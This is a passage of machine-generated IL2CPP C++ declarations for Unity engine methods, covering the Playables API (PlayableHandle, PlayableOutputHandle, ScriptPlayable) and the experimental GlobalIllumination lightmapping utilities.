extern void PlayableHandle_GetScriptInstance_m14D182ED7BEB2AAE1ADD86189A687FF0F86FA925 (void);
// 0x00000912 UnityEngine.Playables.PlayableHandle UnityEngine.Playables.PlayableHandle::GetInputHandle(System.Int32)
extern void PlayableHandle_GetInputHandle_mB9DAEF700C72515D7CA640F71C51A09C08DAD380 (void);
// 0x00000913 System.Void UnityEngine.Playables.PlayableHandle::SetInputWeightFromIndex(System.Int32,System.Single)
extern void PlayableHandle_SetInputWeightFromIndex_mF56AA0C0055C18FF46EF8E315331FDF45D832752 (void);
// 0x00000914 System.Single UnityEngine.Playables.PlayableHandle::GetInputWeightFromIndex(System.Int32)
extern void PlayableHandle_GetInputWeightFromIndex_mF50333BE4F3BD48CCF6A431BC6B99D4CBF131CD6 (void);
// 0x00000915 System.Void UnityEngine.Playables.PlayableHandle::.cctor()
extern void PlayableHandle__cctor_mD503717F819B6D5D115A206B2D88E8B1E5AEADA5 (void);
// 0x00000916 System.Boolean UnityEngine.Playables.PlayableHandle::IsValid_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_IsValid_Injected_mFD1FB7096A30373EAEB9B99406CD836169CF24BB (void);
// 0x00000917 System.Type UnityEngine.Playables.PlayableHandle::GetPlayableType_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetPlayableType_Injected_m5A90A1EC6109FBB31BD9342009B93A9B3913814B (void);
// 0x00000918 System.Void UnityEngine.Playables.PlayableHandle::SetScriptInstance_Injected(UnityEngine.Playables.PlayableHandle&,System.Object)
extern void PlayableHandle_SetScriptInstance_Injected_m9AD355660347CD4868E86C911E4A0A7B332E52CC (void);
// 0x00000919 UnityEngine.Playables.PlayState UnityEngine.Playables.PlayableHandle::GetPlayState_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetPlayState_Injected_m0EED65EC2553F18E6CCFAF3DC9C5928E200657CA (void);
// 0x0000091A System.Void UnityEngine.Playables.PlayableHandle::Play_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_Play_Injected_m52A0C95CCC07769DA0AE72F221DE9344244156CB (void);
// 0x0000091B System.Void UnityEngine.Playables.PlayableHandle::Pause_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_Pause_Injected_mD84BD0C12D89C0B19CF78851F43565DB13D146B9 (void);
// 0x0000091C System.Void UnityEngine.Playables.PlayableHandle::SetSpeed_Injected(UnityEngine.Playables.PlayableHandle&,System.Double)
extern void PlayableHandle_SetSpeed_Injected_m40D6D16DE307C6CF2B1D698C58E80BA4D75D5E1C (void);
// 0x0000091D System.Double UnityEngine.Playables.PlayableHandle::GetTime_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetTime_Injected_mF19D25B42A5962A1E3F2294837A12A2A58CD9555 (void);
// 0x0000091E System.Void UnityEngine.Playables.PlayableHandle::SetTime_Injected(UnityEngine.Playables.PlayableHandle&,System.Double)
extern void PlayableHandle_SetTime_Injected_m4109FB6C48745EB197B5E047EFAD722A32A723AA (void);
// 0x0000091F System.Boolean UnityEngine.Playables.PlayableHandle::IsDone_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_IsDone_Injected_m9FEF721F629DDE1DE068F78E1F57134471984B5A (void);
// 0x00000920 System.Double UnityEngine.Playables.PlayableHandle::GetDuration_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetDuration_Injected_m48BFFA2CAFCA182DC64CB8296784AC84300F5184 (void);
// 0x00000921 System.Void UnityEngine.Playables.PlayableHandle::SetDuration_Injected(UnityEngine.Playables.PlayableHandle&,System.Double)
extern void PlayableHandle_SetDuration_Injected_mDF7D8FD56D90F357DDFBE2CA1BFF7466819E2E3C (void);
// 0x00000922 System.Void UnityEngine.Playables.PlayableHandle::SetPropagateSetTime_Injected(UnityEngine.Playables.PlayableHandle&,System.Boolean)
extern void PlayableHandle_SetPropagateSetTime_Injected_mB04F6DFDE3A083B6267E8728BC548AD89612CA77 (void);
// 0x00000923 System.Void UnityEngine.Playables.PlayableHandle::GetGraph_Injected(UnityEngine.Playables.PlayableHandle&,UnityEngine.Playables.PlayableGraph&)
extern void PlayableHandle_GetGraph_Injected_mF5623BF301E4EF78AFF5241699377A5C7C83B002 (void);
// 0x00000924 System.Int32 UnityEngine.Playables.PlayableHandle::GetInputCount_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetInputCount_Injected_mE5D803A20E99FAB9708043092D6A0EC77C244400 (void);
// 0x00000925 System.Void UnityEngine.Playables.PlayableHandle::SetInputCount_Injected(UnityEngine.Playables.PlayableHandle&,System.Int32)
extern void PlayableHandle_SetInputCount_Injected_mEBC9A90F3A5C51B38C053D0AC008C8D58593621A (void);
// 0x00000926 System.Void UnityEngine.Playables.PlayableHandle::SetInputWeight_Injected(UnityEngine.Playables.PlayableHandle&,UnityEngine.Playables.PlayableHandle&,System.Single)
extern void PlayableHandle_SetInputWeight_Injected_m69E47545E27F77A2EE59625AC4CD748FACAD1D24 (void);
// 0x00000927 System.Double UnityEngine.Playables.PlayableHandle::GetPreviousTime_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetPreviousTime_Injected_m1BCE7E9C90BE79A7D233A26E0A87E705E3199368 (void);
// 0x00000928 System.Void UnityEngine.Playables.PlayableHandle::SetTraversalMode_Injected(UnityEngine.Playables.PlayableHandle&,UnityEngine.Playables.PlayableTraversalMode)
extern void PlayableHandle_SetTraversalMode_Injected_mD62912B271C102CC4DC38117E1665F0DE9DA8227 (void);
// 0x00000929 UnityEngine.Playables.DirectorWrapMode UnityEngine.Playables.PlayableHandle::GetTimeWrapMode_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetTimeWrapMode_Injected_mBD72D109CA54C1E6148889588D3C268A29F1389C (void);
// 0x0000092A System.Void UnityEngine.Playables.PlayableHandle::SetTimeWrapMode_Injected(UnityEngine.Playables.PlayableHandle&,UnityEngine.Playables.DirectorWrapMode)
extern void PlayableHandle_SetTimeWrapMode_Injected_m4FEC7834E661A7962229B6E42A8B972B3B654802 (void);
// 0x0000092B System.Object UnityEngine.Playables.PlayableHandle::GetScriptInstance_Injected(UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetScriptInstance_Injected_m4938B24C8483B6C11AA1114AB8E5178EA8906E3E (void);
// 0x0000092C System.Void UnityEngine.Playables.PlayableHandle::GetInputHandle_Injected(UnityEngine.Playables.PlayableHandle&,System.Int32,UnityEngine.Playables.PlayableHandle&)
extern void PlayableHandle_GetInputHandle_Injected_mD6946C7FC2EC360B1006C3EA10CE680037E53605 (void);
// 0x0000092D System.Void UnityEngine.Playables.PlayableHandle::SetInputWeightFromIndex_Injected(UnityEngine.Playables.PlayableHandle&,System.Int32,System.Single)
extern void PlayableHandle_SetInputWeightFromIndex_Injected_mACBF5DC80B096E544CFB430CA9CB1669BAEF9EB9 (void);
// 0x0000092E System.Single UnityEngine.Playables.PlayableHandle::GetInputWeightFromIndex_Injected(UnityEngine.Playables.PlayableHandle&,System.Int32)
extern void PlayableHandle_GetInputWeightFromIndex_Injected_m62654EEEE4DE8FA291803CA5AC85D3554809862C (void);
// 0x0000092F UnityEngine.Playables.PlayableOutput UnityEngine.Playables.PlayableOutput::get_Null()
extern void PlayableOutput_get_Null_mA7624276D8DE8874A9179656D6AB5D6E4AB1DD7F (void);
// 0x00000930 System.Void UnityEngine.Playables.PlayableOutput::.ctor(UnityEngine.Playables.PlayableOutputHandle)
extern void PlayableOutput__ctor_m55FBB20EC479F67641835EA48D84A1AB3DF39747 (void);
// 0x00000931 UnityEngine.Playables.PlayableOutputHandle UnityEngine.Playables.PlayableOutput::GetHandle()
extern void PlayableOutput_GetHandle_m12FF2889D15884CBEB92A6CB376827EBA5A607BF (void);
// 0x00000932 System.Boolean UnityEngine.Playables.PlayableOutput::IsPlayableOutputOfType()
// 0x00000933 System.Boolean UnityEngine.Playables.PlayableOutput::Equals(UnityEngine.Playables.PlayableOutput)
extern void PlayableOutput_Equals_m4CC730818751114DC5643600B5FE20243F4B7121 (void);
// 0x00000934 System.Void UnityEngine.Playables.PlayableOutput::.cctor()
extern void PlayableOutput__cctor_mA6BE3612E38131B9366284B8D0F96AABD4271D41 (void);
// 0x00000935 System.Void UnityEngine.Playables.PlayableOutputExtensions::SetReferenceObject(U,UnityEngine.Object)
// 0x00000936 System.Void UnityEngine.Playables.PlayableOutputExtensions::SetUserData(U,UnityEngine.Object)
// 0x00000937 UnityEngine.Playables.Playable UnityEngine.Playables.PlayableOutputExtensions::GetSourcePlayable(U)
// 0x00000938 System.Void UnityEngine.Playables.PlayableOutputExtensions::SetSourcePlayable(U,V,System.Int32)
// 0x00000939 System.Int32 UnityEngine.Playables.PlayableOutputExtensions::GetSourceOutputPort(U)
// 0x0000093A System.Void UnityEngine.Playables.PlayableOutputExtensions::SetWeight(U,System.Single)
// 0x0000093B System.Void UnityEngine.Playables.PlayableOutputExtensions::PushNotification(U,UnityEngine.Playables.Playable,UnityEngine.Playables.INotification,System.Object)
// 0x0000093C System.Void UnityEngine.Playables.PlayableOutputExtensions::AddNotificationReceiver(U,UnityEngine.Playables.INotificationReceiver)
// 0x0000093D UnityEngine.Playables.PlayableOutputHandle UnityEngine.Playables.PlayableOutputHandle::get_Null()
extern void PlayableOutputHandle_get_Null_m4ECA1C6CE17D440F3EC5E2FD03E4D59FF20554DE (void);
// 0x0000093E System.Boolean UnityEngine.Playables.PlayableOutputHandle::IsPlayableOutputOfType()
// 0x0000093F System.Int32 UnityEngine.Playables.PlayableOutputHandle::GetHashCode()
extern void PlayableOutputHandle_GetHashCode_mC2FAF756D71026E3AF4492157EDAE7186429B079 (void);
// 0x00000940 System.Boolean UnityEngine.Playables.PlayableOutputHandle::op_Equality(UnityEngine.Playables.PlayableOutputHandle,UnityEngine.Playables.PlayableOutputHandle)
extern void PlayableOutputHandle_op_Equality_mAF77E9AD09CFBA177D85605ACF0B659F7DEE80E4 (void);
// 0x00000941 System.Boolean UnityEngine.Playables.PlayableOutputHandle::Equals(System.Object)
extern void PlayableOutputHandle_Equals_mB9106CB9333E0BF4C893E43AD7A23B64471CC21A (void);
// 0x00000942 System.Boolean UnityEngine.Playables.PlayableOutputHandle::Equals(UnityEngine.Playables.PlayableOutputHandle)
extern void PlayableOutputHandle_Equals_mF5C23882B2A007186F00EB3D23E9BD6664E8DAE6 (void);
// 0x00000943 System.Boolean UnityEngine.Playables.PlayableOutputHandle::CompareVersion(UnityEngine.Playables.PlayableOutputHandle,UnityEngine.Playables.PlayableOutputHandle)
extern void PlayableOutputHandle_CompareVersion_mA7BD9897370F05F9C192AC972A5ED7170C6D945C (void);
// 0x00000944 System.Boolean UnityEngine.Playables.PlayableOutputHandle::IsValid()
extern void PlayableOutputHandle_IsValid_mA94C343D72B72C3B1C7636C93A8DB5EA71691312 (void);
// 0x00000945 System.Type UnityEngine.Playables.PlayableOutputHandle::GetPlayableOutputType()
extern void PlayableOutputHandle_GetPlayableOutputType_m5FA19BC37FD64EC6C2174B6DA6CB202F5451C108 (void);
// 0x00000946 System.Void UnityEngine.Playables.PlayableOutputHandle::SetReferenceObject(UnityEngine.Object)
extern void PlayableOutputHandle_SetReferenceObject_m898B8810539BBD3B4B4382CD436FE84EC60AF77F (void);
// 0x00000947 System.Void UnityEngine.Playables.PlayableOutputHandle::SetUserData(UnityEngine.Object)
extern void PlayableOutputHandle_SetUserData_m23E8BB63D93E67DD981C9045D610C6B2289F435B (void);
// 0x00000948 UnityEngine.Playables.PlayableHandle UnityEngine.Playables.PlayableOutputHandle::GetSourcePlayable()
extern void PlayableOutputHandle_GetSourcePlayable_m6D142AAB19E92AAD5D7C4F96087F27B0F8185627 (void);
// 0x00000949 System.Void UnityEngine.Playables.PlayableOutputHandle::SetSourcePlayable(UnityEngine.Playables.PlayableHandle,System.Int32)
extern void PlayableOutputHandle_SetSourcePlayable_mBC96BBEB1838444B937337B985FFD9A6084A6A8D (void);
// 0x0000094A System.Int32 UnityEngine.Playables.PlayableOutputHandle::GetSourceOutputPort()
extern void PlayableOutputHandle_GetSourceOutputPort_m9E9AA2A0E62DFBA3570DC262AFECD08FF0E71D1F (void);
// 0x0000094B System.Void UnityEngine.Playables.PlayableOutputHandle::SetWeight(System.Single)
extern void PlayableOutputHandle_SetWeight_m6A8B44B22EFA5628A90A87085FD86D478913093F (void);
// 0x0000094C System.Void UnityEngine.Playables.PlayableOutputHandle::PushNotification(UnityEngine.Playables.PlayableHandle,UnityEngine.Playables.INotification,System.Object)
extern void PlayableOutputHandle_PushNotification_m97131909E6A9A76742074B4023CA6C94A2A95610 (void);
// 0x0000094D System.Void UnityEngine.Playables.PlayableOutputHandle::AddNotificationReceiver(UnityEngine.Playables.INotificationReceiver)
extern void PlayableOutputHandle_AddNotificationReceiver_m2E93B0DB0A7A98AECFDAEB02D610B45617FC357C (void);
// 0x0000094E System.Void UnityEngine.Playables.PlayableOutputHandle::.cctor()
extern void PlayableOutputHandle__cctor_m3739C240727C7DE5BE3C36E63D5114227F1EB09D (void);
// 0x0000094F System.Boolean UnityEngine.Playables.PlayableOutputHandle::IsValid_Injected(UnityEngine.Playables.PlayableOutputHandle&)
extern void PlayableOutputHandle_IsValid_Injected_mF0FAAF61F1FA4CC6C3D6AF597D0692C132F7D2C9 (void);
// 0x00000950 System.Type UnityEngine.Playables.PlayableOutputHandle::GetPlayableOutputType_Injected(UnityEngine.Playables.PlayableOutputHandle&)
extern void PlayableOutputHandle_GetPlayableOutputType_Injected_mC562665DE7A01A092A5AFB950140E268DFE0E04F (void);
// 0x00000951 System.Void UnityEngine.Playables.PlayableOutputHandle::SetReferenceObject_Injected(UnityEngine.Playables.PlayableOutputHandle&,UnityEngine.Object)
extern void PlayableOutputHandle_SetReferenceObject_Injected_m7EF0661333F1DD72D9BFBACDEF3F495D82706707 (void);
// 0x00000952 System.Void UnityEngine.Playables.PlayableOutputHandle::SetUserData_Injected(UnityEngine.Playables.PlayableOutputHandle&,UnityEngine.Object)
extern void PlayableOutputHandle_SetUserData_Injected_m17952181084B4E26562511002CC4D6A8C5F596B4 (void);
// 0x00000953 System.Void UnityEngine.Playables.PlayableOutputHandle::GetSourcePlayable_Injected(UnityEngine.Playables.PlayableOutputHandle&,UnityEngine.Playables.PlayableHandle&)
extern void PlayableOutputHandle_GetSourcePlayable_Injected_m3F7DA44437F3A3EB99B21ED7A14DC1D0B5E29726 (void);
// 0x00000954 System.Void UnityEngine.Playables.PlayableOutputHandle::SetSourcePlayable_Injected(UnityEngine.Playables.PlayableOutputHandle&,UnityEngine.Playables.PlayableHandle&,System.Int32)
extern void PlayableOutputHandle_SetSourcePlayable_Injected_mEB3496039206A78B1C1E95071859A28D5D34815F (void);
// 0x00000955 System.Int32 UnityEngine.Playables.PlayableOutputHandle::GetSourceOutputPort_Injected(UnityEngine.Playables.PlayableOutputHandle&)
extern void PlayableOutputHandle_GetSourceOutputPort_Injected_m6D2726A46C963B5AACAD30F7ACEF7B6C544FA332 (void);
// 0x00000956 System.Void UnityEngine.Playables.PlayableOutputHandle::SetWeight_Injected(UnityEngine.Playables.PlayableOutputHandle&,System.Single)
extern void PlayableOutputHandle_SetWeight_Injected_m5EB0E09003315B08698732CAB7E38C6E6A4B6F54 (void);
// 0x00000957 System.Void UnityEngine.Playables.PlayableOutputHandle::PushNotification_Injected(UnityEngine.Playables.PlayableOutputHandle&,UnityEngine.Playables.PlayableHandle&,UnityEngine.Playables.INotification,System.Object)
extern void PlayableOutputHandle_PushNotification_Injected_m417E0D4D14FE3A83C0E7A7BFA4A04821F35850EA (void);
// 0x00000958 System.Void UnityEngine.Playables.PlayableOutputHandle::AddNotificationReceiver_Injected(UnityEngine.Playables.PlayableOutputHandle&,UnityEngine.Playables.INotificationReceiver)
extern void PlayableOutputHandle_AddNotificationReceiver_Injected_mADB405E71B04655BC01DF4299A5D54CF5913A981 (void);
// 0x00000959 UnityEngine.Playables.ScriptPlayable`1<T> UnityEngine.Playables.ScriptPlayable`1::get_Null()
// 0x0000095A UnityEngine.Playables.ScriptPlayable`1<T> UnityEngine.Playables.ScriptPlayable`1::Create(UnityEngine.Playables.PlayableGraph,System.Int32)
// 0x0000095B UnityEngine.Playables.ScriptPlayable`1<T> UnityEngine.Playables.ScriptPlayable`1::Create(UnityEngine.Playables.PlayableGraph,T,System.Int32)
// 0x0000095C UnityEngine.Playables.PlayableHandle UnityEngine.Playables.ScriptPlayable`1::CreateHandle(UnityEngine.Playables.PlayableGraph,T,System.Int32)
// 0x0000095D System.Object UnityEngine.Playables.ScriptPlayable`1::CreateScriptInstance()
// 0x0000095E System.Object UnityEngine.Playables.ScriptPlayable`1::CloneScriptInstance(UnityEngine.Playables.IPlayableBehaviour)
// 0x0000095F System.Object UnityEngine.Playables.ScriptPlayable`1::CloneScriptInstanceFromEngineObject(UnityEngine.Object)
// 0x00000960 System.Object UnityEngine.Playables.ScriptPlayable`1::CloneScriptInstanceFromIClonable(System.ICloneable)
// 0x00000961 System.Void UnityEngine.Playables.ScriptPlayable`1::.ctor(UnityEngine.Playables.PlayableHandle)
// 0x00000962 UnityEngine.Playables.PlayableHandle UnityEngine.Playables.ScriptPlayable`1::GetHandle()
// 0x00000963 T UnityEngine.Playables.ScriptPlayable`1::GetBehaviour()
// 0x00000964 UnityEngine.Playables.Playable UnityEngine.Playables.ScriptPlayable`1::op_Implicit(UnityEngine.Playables.ScriptPlayable`1<T>)
// 0x00000965 UnityEngine.Playables.ScriptPlayable`1<T> UnityEngine.Playables.ScriptPlayable`1::op_Explicit(UnityEngine.Playables.Playable)
// 0x00000966 System.Boolean UnityEngine.Playables.ScriptPlayable`1::Equals(UnityEngine.Playables.ScriptPlayable`1<T>)
// 0x00000967 System.Void UnityEngine.Playables.ScriptPlayable`1::.cctor()
// 0x00000968 UnityEngine.Playables.PlayableBinding UnityEngine.Playables.ScriptPlayableBinding::Create(System.String,UnityEngine.Object,System.Type)
extern void ScriptPlayableBinding_Create_mE90DA29FB018C88259FB06424E0998C6226485B7 (void);
// 0x00000969 UnityEngine.Playables.PlayableOutput UnityEngine.Playables.ScriptPlayableBinding::CreateScriptOutput(UnityEngine.Playables.PlayableGraph,System.String)
extern void ScriptPlayableBinding_CreateScriptOutput_m0ECD710F6E6AF4721AA334AF205095B5376ED505 (void);
// 0x0000096A UnityEngine.Playables.ScriptPlayableOutput UnityEngine.Playables.ScriptPlayableOutput::Create(UnityEngine.Playables.PlayableGraph,System.String)
extern void ScriptPlayableOutput_Create_m3C9D4346965F70C8052FBB29AEFC3E38BAB62771 (void);
// 0x0000096B System.Void UnityEngine.Playables.ScriptPlayableOutput::.ctor(UnityEngine.Playables.PlayableOutputHandle)
extern void ScriptPlayableOutput__ctor_m867BA54A9DCDFCA187EA927F75A6903D0F8FF2C4 (void);
// 0x0000096C UnityEngine.Playables.ScriptPlayableOutput UnityEngine.Playables.ScriptPlayableOutput::get_Null()
extern void ScriptPlayableOutput_get_Null_mAAF09827EE8351C04E4929B6B2EF1BD2F615B5C9 (void);
// 0x0000096D UnityEngine.Playables.PlayableOutputHandle UnityEngine.Playables.ScriptPlayableOutput::GetHandle()
extern void ScriptPlayableOutput_GetHandle_m21A3E97125928298D6942D0EDE58ADAD018E4E93 (void);
// 0x0000096E UnityEngine.Playables.PlayableOutput UnityEngine.Playables.ScriptPlayableOutput::op_Implicit(UnityEngine.Playables.ScriptPlayableOutput)
extern void ScriptPlayableOutput_op_Implicit_m51337F5460513846D79F2E9C0C33311FBF45B400 (void);
// 0x0000096F System.Single UnityEngine.Experimental.GlobalIllumination.LinearColor::get_red()
extern void LinearColor_get_red_m376617B8E3156420835055189BB28D953FE46A2A (void);
// 0x00000970 System.Void UnityEngine.Experimental.GlobalIllumination.LinearColor::set_red(System.Single)
extern void LinearColor_set_red_m0ACFCEDDD205A6F235BE95936816E92898B01B52 (void);
// 0x00000971 System.Single UnityEngine.Experimental.GlobalIllumination.LinearColor::get_green()
extern void LinearColor_get_green_mCCE90A662234EE3605368F3AEC14E51572665AE5 (void);
// 0x00000972 System.Void UnityEngine.Experimental.GlobalIllumination.LinearColor::set_green(System.Single)
extern void LinearColor_set_green_mBD9C7EA6415DC54B3F6B643C3CD02B71565F0694 (void);
// 0x00000973 System.Single UnityEngine.Experimental.GlobalIllumination.LinearColor::get_blue()
extern void LinearColor_get_blue_mAFAEA5D5590DD14CFC48BC18DF4BFEBBDCB0A99A (void);
// 0x00000974 System.Void UnityEngine.Experimental.GlobalIllumination.LinearColor::set_blue(System.Single)
extern void LinearColor_set_blue_m3FEEAF946772BB177733B67D9DA4B72D84874375 (void);
// 0x00000975 UnityEngine.Experimental.GlobalIllumination.LinearColor UnityEngine.Experimental.GlobalIllumination.LinearColor::Convert(UnityEngine.Color,System.Single)
extern void LinearColor_Convert_mB94629473570EEFB0A92B706C0F18AA17FB05803 (void);
// 0x00000976 UnityEngine.Experimental.GlobalIllumination.LinearColor UnityEngine.Experimental.GlobalIllumination.LinearColor::Black()
extern void LinearColor_Black_m29E930EAED6270F37E98DCFDE78417DACEBA26A3 (void);
// 0x00000977 System.Void UnityEngine.Experimental.GlobalIllumination.LightDataGI::Init(UnityEngine.Experimental.GlobalIllumination.DirectionalLight&,UnityEngine.Experimental.GlobalIllumination.Cookie&)
extern void LightDataGI_Init_m112DEBB76EC57AC52E6384C97A3E8B2EAA867207 (void);
// 0x00000978 System.Void UnityEngine.Experimental.GlobalIllumination.LightDataGI::Init(UnityEngine.Experimental.GlobalIllumination.PointLight&,UnityEngine.Experimental.GlobalIllumination.Cookie&)
extern void LightDataGI_Init_mACE06E00CC639CA89F3847E9DB55FD0F00812A7A (void);
// 0x00000979 System.Void UnityEngine.Experimental.GlobalIllumination.LightDataGI::Init(UnityEngine.Experimental.GlobalIllumination.SpotLight&,UnityEngine.Experimental.GlobalIllumination.Cookie&)
extern void LightDataGI_Init_m0A999D118CDCBDA99B9E24231ED057D943C9C67B (void);
// 0x0000097A System.Void UnityEngine.Experimental.GlobalIllumination.LightDataGI::Init(UnityEngine.Experimental.GlobalIllumination.RectangleLight&,UnityEngine.Experimental.GlobalIllumination.Cookie&)
extern void LightDataGI_Init_mDC887CA8191C6CADE1DB585D7FEB46B080B25038 (void);
// 0x0000097B System.Void UnityEngine.Experimental.GlobalIllumination.LightDataGI::Init(UnityEngine.Experimental.GlobalIllumination.DiscLight&,UnityEngine.Experimental.GlobalIllumination.Cookie&)
extern void LightDataGI_Init_mB2D1C73EDFEA6815E39A0FE3ED2F7BF9A7117632 (void);
// 0x0000097C System.Void UnityEngine.Experimental.GlobalIllumination.LightDataGI::InitNoBake(System.Int32)
extern void LightDataGI_InitNoBake_mBDF2EFB22D4BEE63B6F25F4EE9F1522D2866ED43 (void);
// 0x0000097D UnityEngine.Experimental.GlobalIllumination.LightMode UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::Extract(UnityEngine.LightmapBakeType)
extern void LightmapperUtils_Extract_m3D10A882381C72E4BC640EFA43BEB204C8E31A92 (void);
// 0x0000097E UnityEngine.Experimental.GlobalIllumination.LinearColor UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::ExtractIndirect(UnityEngine.Light)
extern void LightmapperUtils_ExtractIndirect_mEC02DC55F36EA834577CE8C4799B0CD58584AB13 (void);
// 0x0000097F System.Single UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::ExtractInnerCone(UnityEngine.Light)
extern void LightmapperUtils_ExtractInnerCone_m546DD25E1DEFA2B7EECF8D0C5AB7B46F70426138 (void);
// 0x00000980 UnityEngine.Color UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::ExtractColorTemperature(UnityEngine.Light)
extern void LightmapperUtils_ExtractColorTemperature_m5C531A8B05786E5AE7021ACD4B0A03ED11CE2882 (void);
// 0x00000981 System.Void UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::ApplyColorTemperature(UnityEngine.Color,UnityEngine.Experimental.GlobalIllumination.LinearColor&)
extern void LightmapperUtils_ApplyColorTemperature_m54994440A9598A4048214988DC9ACA574AA40B69 (void);
// 0x00000982 System.Void UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::Extract(UnityEngine.Light,UnityEngine.Experimental.GlobalIllumination.DirectionalLight&)
extern void LightmapperUtils_Extract_m168917A3FFE696B6B4F2BE2ACFB5C74AEA57AAE0 (void);
// 0x00000983 System.Void UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::Extract(UnityEngine.Light,UnityEngine.Experimental.GlobalIllumination.PointLight&)
extern void LightmapperUtils_Extract_m43F2AE128B08ACD1BE42D1A48FCE9DA5BD1BFF23 (void);
// 0x00000984 System.Void UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::Extract(UnityEngine.Light,UnityEngine.Experimental.GlobalIllumination.SpotLight&)
extern void LightmapperUtils_Extract_m923E63DD2078497852AEC688E199BE6E129B69C4 (void);
// 0x00000985 System.Void UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::Extract(UnityEngine.Light,UnityEngine.Experimental.GlobalIllumination.RectangleLight&)
extern void LightmapperUtils_Extract_m6CD2C57089AE0B41970C60A597EAFBF3BE27B3A6 (void);
// 0x00000986 System.Void UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::Extract(UnityEngine.Light,UnityEngine.Experimental.GlobalIllumination.DiscLight&)
extern void LightmapperUtils_Extract_m4DB65098D5061C188791D825490B46EEE305DE6D (void);
// 0x00000987 System.Void UnityEngine.Experimental.GlobalIllumination.LightmapperUtils::Extract(UnityEngine.Light,UnityEngine.Experimental.GlobalIllumination.Cookie&)
extern void LightmapperUtils_Extract_mFA23473CE371297DB7005D09ED8FF62D25B41010 (void);
// 0x00000988 System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping::SetDelegate(UnityEngine.Experimental.GlobalIllumination.Lightmapping/RequestLightsDelegate)
extern void Lightmapping_SetDelegate_m71AF5AA8199040B3E901661236D09205092D0D8D (void);
// 0x00000989 UnityEngine.Experimental.GlobalIllumination.Lightmapping/RequestLightsDelegate UnityEngine.Experimental.GlobalIllumination.Lightmapping::GetDelegate()
extern void Lightmapping_GetDelegate_m847670CDD1E8DA380930C322A5713587AF3D2396 (void);
// 0x0000098A System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping::ResetDelegate()
extern void Lightmapping_ResetDelegate_mEFE29946965EAC2C6A5CDB5A4AF9A1B0069FAE1B (void);
// 0x0000098B System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping::RequestLights(UnityEngine.Light[],System.IntPtr,System.Int32)
extern void Lightmapping_RequestLights_m212529C7EE6B36F03073D4F372B4609E5867B12C (void);
// 0x0000098C System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping::.cctor()
extern void Lightmapping__cctor_m759E8C6D97EBF814850F73B24EC5476007DA8BFF (void);
// 0x0000098D System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping/RequestLightsDelegate::.ctor(System.Object,System.IntPtr)
extern void RequestLightsDelegate__ctor_mFFCE8681C67A169A04BEA2201C393E1FC84CAB7D (void);
// 0x0000098E System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping/RequestLightsDelegate::Invoke(UnityEngine.Light[],Unity.Collections.NativeArray`1<UnityEngine.Experimental.GlobalIllumination.LightDataGI>)
extern void RequestLightsDelegate_Invoke_m01792B793691E6471596FF9B30E4D6F8EA18227E (void);
// 0x0000098F System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping/<>c::.cctor()
extern void U3CU3Ec__cctor_m44A253B91A8449C4AA3E269C17162C626673F6C6 (void);
// 0x00000990 System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping/<>c::.ctor()
extern void U3CU3Ec__ctor_m3FBD26AEC83F79DACB13A7EF6FE5F539A71F0902 (void);
// 0x00000991 System.Void UnityEngine.Experimental.GlobalIllumination.Lightmapping/<>c::<.cctor>b__7_0(UnityEngine.Light[],Unity.Collections.NativeArray`1<UnityEngine.Experimental.GlobalIllumination.LightDataGI>)
extern void U3CU3Ec_U3C_cctorU3Eb__7_0_m3DE1C9F0E58017EDCEAFA5FEC90132A153B492F6 (void);
// 0x00000992 UnityEngine.Playables.PlayableHandle UnityEngine.Experimental.Playables.CameraPlayable::GetHandle()
extern void CameraPlayable_GetHandle_mA04469CA50B43AF6219F9967B8AEB310CB5455BD (void);
// 0x00000993 System.Boolean UnityEngine.Experimental.Playables.CameraPlayable::Equals(UnityEngine.Experimental.Playables.CameraPlayable)
extern void CameraPlayable_Equals_mD0FA195F3EA6511043E8F0AA1680CEB7E0E2E2CF (void);
// 0x00000994 UnityEngine.Playables.PlayableHandle UnityEngine.Experimental.Playables.MaterialEffectPlayable::GetHandle()
extern void MaterialEffectPlayable_GetHandle_m748319E116317E9ADD1EA36A4EDA488338471058 (void);
// 0x00000995 System.Boolean UnityEngine.Experimental.Playables.MaterialEffectPlayable::Equals(UnityEngine.Experimental.Playables.MaterialEffectPlayable)
extern void MaterialEffectPlayable_Equals_mC55640B5D29F90360F9743549FABD43C5AA320EC (void);
// 0x00000996 UnityEngine.Playables.PlayableHandle UnityEngine.Experimental.Playables.TextureMixerPlayable::GetHandle()
extern void TextureMixerPlayable_GetHandle_mB75CF651C6BDDF347ED6938D0F1DE4BED92BB7CD (void);
// 0x00000997 System.Boolean UnityEngine.Experimental.Playables.TextureMixerPlayable::Equals(UnityEngine.Experimental.Playables.TextureMixerPlayable)
extern void TextureMixerPlayable_Equals_m6838329B39779020FC3309B7406B8A0418F44FE7 (void);
// 0x00000998 UnityEngine.Playables.PlayableOutputHandle UnityEngine.Experimental.Playables.TexturePlayableOutput::GetHandle()
